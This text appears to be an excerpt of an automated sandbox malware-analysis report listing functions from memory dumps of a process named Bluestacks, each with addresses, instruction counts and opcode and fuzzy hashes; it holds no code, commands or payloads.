Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7d35e7a1dbb604aa257f76d0c2e43baf6c62e1e71aa97b99b8769638c909491
Instruction ID: 8ffcdd03966a0910e4b3b699920f585f2d7cd369216a77cb01051afd24553d45
Opcode Fuzzy Hash: f7d35e7a1dbb604aa257f76d0c2e43baf6c62e1e71aa97b99b8769638c909491
Instruction Fuzzy Hash: BA21C012F0F5978AFAE9565419B90BCE6889F47738F38017BD64EDA1C2CC0D28853F92

Function 00007FFD34A67427 Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10e6c045751eb59137d722820c1393421bbe3bb9fdb4babe5c1f5a3c91e5447e
Instruction ID: 8a87bee5247f2fe84fe69556bfbc659ab02018b2d16951e7f9b41d5569730fb9
Opcode Fuzzy Hash: 10e6c045751eb59137d722820c1393421bbe3bb9fdb4babe5c1f5a3c91e5447e
Instruction Fuzzy Hash: 29719039B2C4494FE768DA1884AA5B437D1FF4E336B2402FDD65EC3592DD1CAC069781

Function 00007FFD34A65C87 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a2c566c89f8b798c3b61cc4468474981185dc064c8512af58838422b2e10233
Instruction ID: f3b215c0cde04ec9b4fc5de8dedbceabdd1b919dfaeb1e8f13b27fd68968038b
Opcode Fuzzy Hash: 6a2c566c89f8b798c3b61cc4468474981185dc064c8512af58838422b2e10233
Instruction Fuzzy Hash: 35714A31A0C949CFE7ECDA18A4EA5B837D0FF46334B2402B9D25EC75E2DD1CA8169781

Function 00007FFD34A6064B Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d98a5a54d95c1d917e883e278008d0d2779f959beaa43792bc9852ef2ab21bf6
Instruction ID: e0ccfad094aeb689e2ddfcb2bc646f0a80db51f7294ee4f26f7ec6df311929e6
Opcode Fuzzy Hash: d98a5a54d95c1d917e883e278008d0d2779f959beaa43792bc9852ef2ab21bf6
Instruction Fuzzy Hash: AA71C370E1C64A8FEBA5DB6484A46BD7BA1EF56324F2004B9D10ED71C2DF6C6881E741

Function 00007FFD34A6EA5B Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8dc8e852d25a962a363cab2b7068d7ac24704dc52d773d0b20325d5bdd2b878
Instruction ID: 3ba702517381ea5a36921fbcb2a05be7f2f7977d19b1b70247e3e13755ed244d
Opcode Fuzzy Hash: c8dc8e852d25a962a363cab2b7068d7ac24704dc52d773d0b20325d5bdd2b878
Instruction Fuzzy Hash: D671B230E1C64E8EEBA5DB6484A46BEBBF1FF66329F640479D10ED7181DE2C6841E740

Function 00007FFD34A6979B Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d301fe19597641aacf197b3bed285515de0b7edc8448da0c8f5de4ac47b0aab
Instruction ID: 493cdcfd5931c50c551c3d8062059c59f0173ee3b9537c637540d8c5138234a8
Opcode Fuzzy Hash: 1d301fe19597641aacf197b3bed285515de0b7edc8448da0c8f5de4ac47b0aab
Instruction Fuzzy Hash: 4061C371E1D64E8EEBA5DF6488A02FCB7E4EF56318F2004BAD10ED7192DE2D6841DB41

Function 00007FFD34A6DEC2 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 866a82e7e139bc4b79159f959937215a2ff9d39e9589a4e71f0e6cc54ac17e50
Instruction ID: d46f21501cff6d79665eac474df58b71f68ff0202c9b1738905d4bcdf3f0e44a
Opcode Fuzzy Hash: 866a82e7e139bc4b79159f959937215a2ff9d39e9589a4e71f0e6cc54ac17e50
Instruction Fuzzy Hash: A5516C31B0C4494FE768DA1888B65B937D1FF46334B2502BDD25EC75E2DE2CA806D781

Function 00007FFD34A68C02 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e36303c7378a523f32fc295a51b329de01041490f8b8758dc051d91ad9aab8d9
Instruction ID: 0252e7f8a505ce60073d96dc1da350d6e02e1e864a0e20747fa1f65717f65f00
Opcode Fuzzy Hash: e36303c7378a523f32fc295a51b329de01041490f8b8758dc051d91ad9aab8d9
Instruction Fuzzy Hash: 1A514A3170E4498FE768DB18C8B65B937D4FF56334B2402BDD29EC75A2DE2CA80A9741

Function 00007FFD34A670B5 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7c1ef8ec1058fc5375d4f3867dfaec0aca46876757ffce28a58c1c2d28a07ab
Instruction ID: 414dccda78867098d31c9d8619046c4348bab1c776ce34405c511c355c8853bc
Opcode Fuzzy Hash: b7c1ef8ec1058fc5375d4f3867dfaec0aca46876757ffce28a58c1c2d28a07ab
Instruction Fuzzy Hash: 12514C31F0C5594FEB74969888B57F87BA1EF52318F2085BAC24EDB192CD3CA885D781

Function 00007FFD34A658C4 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe03f9ea5b669bd972e4f831882cf2d46901a96db66afca34f4efe5483fe9b70
Instruction ID: 70ff95ada3e8f5820cdd4b0efe79693a6bb7cc4d0cef469848a3e80f17967234
Opcode Fuzzy Hash: fe03f9ea5b669bd972e4f831882cf2d46901a96db66afca34f4efe5483fe9b70
Instruction Fuzzy Hash: 0F510830B1C55A4AEBB4DB9888B06F87BE1FF51308F2481BAC18DD7286DD2C68819741

Function 00007FFD34A681C4 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acd5ebc815cec74ee055abdd7fe28287016c2e94dcac53447d30a7c7cd350434
Instruction ID: 671ad7b6584f77b854fa79e5d0c8f5bdc2e802cfa1e850ef17ee9c1b859f244b
Opcode Fuzzy Hash: acd5ebc815cec74ee055abdd7fe28287016c2e94dcac53447d30a7c7cd350434
Instruction Fuzzy Hash: 41417A3170E6854FDB12EB64D4B15E53BA4EF53324F2802F6C588CF197CA2CA886C751

Function 00007FFD34A641B7 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97938f5720896c62afae04056cfc1a0ba0fb10f7f8fc7dcaa12f58f2cccdb0b6
Instruction ID: 3daa4791ec8aebf01235ce4f5d26d739a1cec0ba94b9b4c1d0c7c1164bac8858
Opcode Fuzzy Hash: 97938f5720896c62afae04056cfc1a0ba0fb10f7f8fc7dcaa12f58f2cccdb0b6
Instruction Fuzzy Hash: 0541A53260C949CFDF88EF58C4A5DB9B3E1FBA9324714056ED44EC7292CE25E885CB81

Function 00007FFD34A6D2F7 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fa620261699ac1ee227919e5733129c292fed368be5fcbe5fc017124b793879
Instruction ID: 7dc7eff0d9500bbf9943a8f6ca58b4fc0b47ead72839ce9343f546598181f729
Opcode Fuzzy Hash: 5fa620261699ac1ee227919e5733129c292fed368be5fcbe5fc017124b793879
Instruction Fuzzy Hash: 4741523160C9498FDF98EF1CC4A59B9B3E1FBA9324714056ED04ED7292DE29EC85CB81

Function 00007FFD34A6D105 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5918b1a1de3d568728312c2ed78ae70e50863341c951e5783e3857ef02f2919d
Instruction ID: 1d2a1cac1759ccb28ed460317e92c9748e393112ebf934236a4ac35fcf0ffaf5
Opcode Fuzzy Hash: 5918b1a1de3d568728312c2ed78ae70e50863341c951e5783e3857ef02f2919d
Instruction Fuzzy Hash: C8416A71E1E54ECBEBA8DB5484A11BD77B0FF46398F20007AD60EE6181CF7C6940AB81

Function 00007FFD34A64261 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c8fb782737b322fa020ea5169d8720a6bc869ec50c2fe946a23dfe4b93d3aaa
Instruction ID: 6192806f299ed8dcb7b8cacf31a1f9e877c5eaaacaec942faad16a24a0d1c076
Opcode Fuzzy Hash: 6c8fb782737b322fa020ea5169d8720a6bc869ec50c2fe946a23dfe4b93d3aaa
Instruction Fuzzy Hash: 5531913260C9498FDF98EF28C4A5DB973E1FBA931471405AED44AC7292CE25E885CB81

Function 00007FFD34A6D3A1 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 055a38df4354b5046c202710653c491adc4d61e5ef0ad13c317d1fa703d88975
Instruction ID: cf67b0fec2ee15673fc0d1dda8b6031be1e7933e17d91e190fb68c68add62115
Opcode Fuzzy Hash: 055a38df4354b5046c202710653c491adc4d61e5ef0ad13c317d1fa703d88975
Instruction Fuzzy Hash: D3314F316089488FDB98EF1CC4A5AA9B7E1FBB931471405AED04ED7292DE25EC85CB81

Function 00007FFD34670908 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cd09c376caa99ecaeec8454059c6ebc7a4fe30a76283cee91b194be6247da6b
Instruction ID: ca68270d18e4a4d9d269f54444bdb2bbc1f8f9cac9c2ecfb71bbb1f69938b873
Opcode Fuzzy Hash: 2cd09c376caa99ecaeec8454059c6ebc7a4fe30a76283cee91b194be6247da6b
Instruction Fuzzy Hash: F221F83130CC184FD768EA1CE889DB977D1EB5A32130501BAE58EC7165E911EC8287C1

Function 00007FFD34A641FB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2d569233cac6f9dbd53f2bf50e6e353b34c6764afdcd189f1f94232dfc78ce0
Instruction ID: f6968d24400cef46f66194d88a8cf78c45a8d5141ecd15b61d6e0948ca12527f
Opcode Fuzzy Hash: e2d569233cac6f9dbd53f2bf50e6e353b34c6764afdcd189f1f94232dfc78ce0
Instruction Fuzzy Hash: E831953160C949CFDF98EF58C0A5DB973E1FB6931471405ADD44AC7292CE25F985CB81

Function 00007FFD34A6D33B Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 869d17ad6bd660b569e4255fac53a5e4f2126df82c62427f82ca92491de617a6
Instruction ID: c442d1e01261c2fa710119dcff345f92ccea56b627f951a4cc8f336e1a11eace
Opcode Fuzzy Hash: 869d17ad6bd660b569e4255fac53a5e4f2126df82c62427f82ca92491de617a6
Instruction Fuzzy Hash: 263150316089498FDB98EF1CC4A59B9B3E1FBB9314714056ED04ED7292DE29F881CB81

Function 00007FFD34A6592C Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1b7615c83507907b85cae815d5e1a3c3c2c5ed85ea22f7641848f2dc5ad9a41
Instruction ID: db54ce7abc50ab7741ee8d4ce9ffd1b41167e96eb03df4c9e6bde4d0109fad9d
Opcode Fuzzy Hash: b1b7615c83507907b85cae815d5e1a3c3c2c5ed85ea22f7641848f2dc5ad9a41
Instruction Fuzzy Hash: 5B31B767E0D7CA4EEBA19A68A8F50FA3BE0EF5337CB1500B7C285D6093DD1C28069751

Function 00007FFD34A65915 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b107f59f42cabe59d7d8a7b838a266ce749c76bfe6f42689d191d9296389b154
Instruction ID: 13384d7cf72d631e7a55ebb5934e944b2c4d9ff46dad124f41cb2b4bbc3892f2
Opcode Fuzzy Hash: b107f59f42cabe59d7d8a7b838a266ce749c76bfe6f42689d191d9296389b154
Instruction Fuzzy Hash: 9E31A867E1D68A4EFBA19A2858F50FD7BE0EF5333CF250077C259D6092DD1C6806A251

Function 00007FFD34A63FC5 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4008d7fa7aa9618f32b207eb835be414399e7359b92ae926674973dfbde4184
Instruction ID: aa845fc5f57c0dd20837577476a116a478bfb448f6a8c6686f3167d186d1f1e5
Opcode Fuzzy Hash: e4008d7fa7aa9618f32b207eb835be414399e7359b92ae926674973dfbde4184
Instruction Fuzzy Hash: 37317A30A0C55ACFFB98DB5484E19BD7BB0FF46318F22007AD60ED6682CA3D6940A745

Function 00007FFD34A67095 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8b8375f8fe8be3db6b9c946acd5c87f1d8d6557593d2a407e7808b161540977
Instruction ID: 3ebb597aaacee9bbc30b35b65b14f1b9f0ae6c5f4f37396992591f11e15fd781
Opcode Fuzzy Hash: f8b8375f8fe8be3db6b9c946acd5c87f1d8d6557593d2a407e7808b161540977
Instruction Fuzzy Hash: EF31FB38B1850ACADB68DB9488A55FD7BA1FF4530EF60447AE90ED6191CB3C7940AA81

Function 00007FFD34A6DB5E Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 458fce15269efc72393a3b318232aa83a015ba02965af9634ff00c83b60eb83f
Instruction ID: 2e6fb963d431352080b8b2e645f85e1f56b0143cbaa1fb0a0c663f425f4b15a9
Opcode Fuzzy Hash: 458fce15269efc72393a3b318232aa83a015ba02965af9634ff00c83b60eb83f
Instruction Fuzzy Hash: 5731A43090D6CE8FDB96CBA4C8A05ED7FF1FF5A324F1400AAD14AE7192CA6D5846D711

Function 00007FFD34670C25 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ecd2d6196a89e891db7b394559b5931768ee81191c4bd602c72a357db29b6a2
Instruction ID: bdb7a84fcf6a60ebcf811fe9bb8b00d1da39e1a5d050a7a4172bb5e08b2b5eaa
Opcode Fuzzy Hash: 0ecd2d6196a89e891db7b394559b5931768ee81191c4bd602c72a357db29b6a2
Instruction Fuzzy Hash: F7214B76B0DAA98FE7129BA89CA11ED7F60EF43325F1481B3D248CB183D93C65069791

Function 00007FFD34A65964 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7bae9c566ec390ce00346133c43f8b5c07901190a22e898027eb8b5e0fa5b7b
Instruction ID: 6d7fdab7e8dabee8d9e2762a14857595ee16d93f3605afb8300f8fde8b815465
Opcode Fuzzy Hash: e7bae9c566ec390ce00346133c43f8b5c07901190a22e898027eb8b5e0fa5b7b
Instruction Fuzzy Hash: 1D21D267E1D68A4EEBA19A28A8B50FE7BE0EF5333CF240077C249D6092ED1C28059351

Function 00007FFD34A6132D Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09a25f1ef6a0821fa18411fb18181cbf3c4a2c5e100e5b970abf8e6a5f456d34
Instruction ID: cd7f295860e5d2a9b19c6182309baf32d99277cb3d5a6dbf295d440bc8519f27
Opcode Fuzzy Hash: 09a25f1ef6a0821fa18411fb18181cbf3c4a2c5e100e5b970abf8e6a5f456d34
Instruction Fuzzy Hash: 05214F71B099464BDB84DF6CC4F15A8B7A1FF5A320B144179D59EC3686CF28B812DB80

Function 00007FFD34A62EB0 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86c5c549c9f491d0eafcf8e6060545c1b69c30ccb08735078a51b7344c7266ef
Instruction ID: 9af036e8629e21045a1a2e8b57eb363f141070ccef14e2b039085df7bce10bdc
Opcode Fuzzy Hash: 86c5c549c9f491d0eafcf8e6060545c1b69c30ccb08735078a51b7344c7266ef
Instruction Fuzzy Hash: 13314912A5C5968FE72A921484B45B87B91EF43324B384ABED587CF4D7C93CA882E341

Function 00007FFD34A61403 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5507be4300307af2d35d397ce7553c0ce01550961e41584ad22b67155a90d898
Instruction ID: ad548f315a6f6cf2820455cf0ad49c69bf6b94b3b9fa7202d3342abaf41e4128
Opcode Fuzzy Hash: 5507be4300307af2d35d397ce7553c0ce01550961e41584ad22b67155a90d898
Instruction Fuzzy Hash: EF21F671F0D5894EEB949A6898B62F87BD0FF57328F2401B9D59EC72C3DD1DA8069340

Function 00007FFD34A6BFF0 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0899b4cc22f726c477442953068953c302cc144f6ab401ea8a5e5cc70361151
Instruction ID: 0b5de316086a53b41b69452c5beb48eb252704e8702652d6c4b5c64411347fe7
Opcode Fuzzy Hash: e0899b4cc22f726c477442953068953c302cc144f6ab401ea8a5e5cc70361151
Instruction Fuzzy Hash: 42312B10A5C5978EF729861848B06747B95EF53324B3946BAD58ACB0D7C91CB981A381

Function 00007FFD34A6ABD6 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37b63c68409c00312ce6b3c6c816ba90a80745e960352dbe72a5e7fd4305db5b
Instruction ID: 12c359087711e90c15f310138d5e1ae7ac3c87b324f927c56369fc20af39f0e7
Opcode Fuzzy Hash: 37b63c68409c00312ce6b3c6c816ba90a80745e960352dbe72a5e7fd4305db5b
Instruction Fuzzy Hash: 54215131B1C6068BD7789E4851E153973D5EF9B328B30543DDA8FC3282DD2DBC426642

Function 00007FFD34A602C2 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 182582a6870e328bb64cfc87038987a880a20f70d0f92b7a36670863efbcacf3
Instruction ID: aaef5cca1bac851b87ecf25eb6eda5331832a967e0d5813eb0f529e83bac2ac1
Opcode Fuzzy Hash: 182582a6870e328bb64cfc87038987a880a20f70d0f92b7a36670863efbcacf3
Instruction Fuzzy Hash: 4121F771A0991D8FDF98DB58C4A5AEDB3B1FF69315F1001AAD14EE3291CB39A981CB40

Function 00007FFD34A688C1 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ee4a7baefe1f61249f3d015201b0fd7a87cec647057bf089c4ca7bbdfa83b49
Instruction ID: b7eb60ec88e57fe7e3fe35f891c680d16e77d77947bf0659351463aa4663ad3a
Opcode Fuzzy Hash: 9ee4a7baefe1f61249f3d015201b0fd7a87cec647057bf089c4ca7bbdfa83b49
Instruction Fuzzy Hash: CA218C71E1D99D8FDB94DF98C8A05ECBBB1FF59314F20007ED10AE7281DA286801DB42

Function 00007FFD34A6598D Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b22016d433d3b59d99862ecc87739ddc6c0f01eede4a3df275e85952e8e41ea3
Instruction ID: f3383898de173fe311adac19a47d998dc39b65481730003507ed0e7206fd2e6d
Opcode Fuzzy Hash: b22016d433d3b59d99862ecc87739ddc6c0f01eede4a3df275e85952e8e41ea3
Instruction Fuzzy Hash: 2621F466E1D78A4FEB919B6898B50EE7BF0EF57328F14007BC245D6092EE1C28059751

Function 00007FFD34A61AA6 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b603801741d0275906297708f6f7e9f93823b245935420a27ea1bdbe485d125b
Instruction ID: c71c3d018cd9ca6c94c79ffc000929b3a50bec220194d6a8a691e0febb1c0c32
Opcode Fuzzy Hash: b603801741d0275906297708f6f7e9f93823b245935420a27ea1bdbe485d125b
Instruction Fuzzy Hash: 18215030F1CA068BD6789E1855E113976E5EF66328B74093DD6CFC3581EE1CB8066642

Function 00007FFD34A6A492 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51c2d2517de76b5e68815c3a11d2a19549bbeb50e14a4c5aaaea3baf000d93ee
Instruction ID: 0dea5e735c7b913a4fcc8f9c3d2e5cf521344c3600680a4d2e59e1e25266bb02
Opcode Fuzzy Hash: 51c2d2517de76b5e68815c3a11d2a19549bbeb50e14a4c5aaaea3baf000d93ee
